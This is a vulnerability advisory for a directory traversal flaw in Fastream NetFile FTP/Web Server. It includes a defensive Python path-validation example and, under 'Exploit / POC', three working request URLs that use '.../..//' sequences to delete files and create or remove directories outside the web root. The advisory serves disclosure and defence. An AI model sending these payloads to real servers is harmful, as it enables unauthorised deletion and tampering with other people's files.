Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
BID:13388
Info
| Field | Value |
| --- | --- |
| Bugtraq ID: | 13388 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 26 2005 12:00AM |
| Updated: | Apr 26 2005 12:00AM |
| Credit: | Discovery credited to Chew Keong TAN <[email protected]>. |
| Vulnerable: | Fastream NetFILE FTP/Web Server 7.1; 6.7.5; 6.7.3; 6.7.2.1085; 6.5.1.981; 6.5.1.980 |
| Not Vulnerable: | Fastream NetFILE FTP/Web Server 7.5 Beta 7 |
Discussion
The NetFile FTP/Web Server is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data. This can allow an attacker to create, view, and delete arbitrary files outside the web root.
A similar issue was reported in BID 10658. The fix for that issue did not properly filter all directory traversal sequences.
This issue is addressed in NetFile version 7.5.0 Beta 7 and above.
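The lesson of the variant is that filtering known traversal sequences is fragile; the durable check validates every path component and then confirms the canonical path still lies under the web root. The following check is an added example and is not NetFile's code: the web root, the function names and the benign filenames are assumptions, while the two rejected inputs are the filenames from the proof-of-concept URLs in this advisory.

```python
import posixpath

# Assumed web root for the example; NetFile's real configuration is not on the page.
WEB_ROOT = "/srv/www/root"

# Filenames taken from the advisory's proof-of-concept URLs.
POC_FILENAMES = [
    ".../..//a/.../yyy.txt",
    ".../..//a/.../testdir",
]

def _components(filename):
    # Treat '\' like '/' so Windows-style separators get the same scrutiny.
    return filename.replace("\\", "/").split("/")

def is_safe_filename(filename):
    """Allowlist check: True only for a relative path whose every component is a
    plain name. Rejects empty components (from '//'), dot-only components
    ('.', '..', '...' and longer runs), NUL bytes, leading separators and
    drive letters. Strict on purpose: a trailing '/' is rejected as well."""
    if not filename or "\x00" in filename:
        return False
    if filename.startswith(("/", "\\")) or (len(filename) > 1 and filename[1] == ":"):
        return False
    for part in _components(filename):
        if part == "" or part.strip(".") == "":
            return False
    return True

def resolve_under_root(filename, root=WEB_ROOT):
    """Canonicalise and confirm the result stays inside `root`; None otherwise.
    The containment test is defence in depth on top of the component check:
    it is the property a sequence denylist never actually verifies."""
    if not is_safe_filename(filename):
        return None
    candidate = posixpath.normpath(posixpath.join(root, filename.replace("\\", "/")))
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        return None
    return candidate

def classify(filenames):
    """Map each requested filename to its resolved path, or None when rejected."""
    return {name: resolve_under_root(name) for name in filenames}

if __name__ == "__main__":
    # Constructed benign names alongside the advisory's inputs.
    for name, resolved in classify(POC_FILENAMES + ["a/yyy.txt", "docs/readme.txt"]).items():
        print(f"{name!r:28} -> {'REJECT' if resolved is None else resolved}")
```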
Exploit / POC
No exploit is required.
The following proof of concepts are available:
http://www.example.com/?command=delete&filename=.../..//a/.../yyy.txt
http://www.example.com/?command=mkdir&filename=.../..//a/.../testdir
http://www.example.com/?command=rmdir&filename=.../..//a/.../testdir
Solution / Fix
Solution:
This vulnerability is reportedly addressed in Fastream NetFile FTP/Web Server 7.5.0 Beta 7; however, this has not been confirmed by Symantec. Users are advised to contact the vendor for information on obtaining a fixed version.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
- Fastream NETFile FTP/Web Server (Fastream)